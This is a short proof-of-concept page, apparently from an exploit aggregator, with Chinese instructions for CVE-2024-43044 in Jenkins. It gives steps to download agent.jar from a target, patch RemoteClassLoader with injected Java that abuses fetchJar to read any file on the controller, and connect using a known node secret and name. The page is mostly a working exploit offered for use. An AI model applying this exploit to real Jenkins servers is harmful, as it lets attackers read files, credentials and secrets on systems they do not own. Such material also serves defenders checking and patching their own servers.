Share
## https://sploitus.com/exploit?id=FF575172-483B-596A-A7AF-518734EE3F95
# 用法
通过`http://ip:port/jnlpJars/agent.jar`下载jar包
修改`\hudson\remoting\RemoteClassLoader.class`对应代码
![](https://raw.githubusercontent.com/v9d0g/CVE-2024-43044-POC/main/CVE-2024-43044/images/Pasted%20image%2020240813152523.png)
重新编译打包
需提前获悉node的密钥和名称
![](https://raw.githubusercontent.com/v9d0g/CVE-2024-43044-POC/main/CVE-2024-43044/images/Pasted%20image%2020240813152737.png)
```sh
java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>
```
添加内容为:
```java
import java.util.Scanner;
try {
Scanner scanner = new Scanner(System.in);
System.out.print("输入读取文件path:");
String inputText = scanner.nextLine();
System.out.println("尝试读取:" + inputText);
URL jarFileUrl = new URL("file:///" + inputText);
byte[] fileContent = this.proxy.fetchJar(jarFileUrl);
String contentAsString = new String(fileContent, StandardCharsets.UTF_8);
System.out.println("文件内容:\n" + contentAsString);
} catch (Exception var10) {
System.out.println("WRONG:" + var10);
}
```
![](https://raw.githubusercontent.com/v9d0g/CVE-2024-43044-POC/main/CVE-2024-43044/images/c86ff215c67be979327f82a64485d30d.png)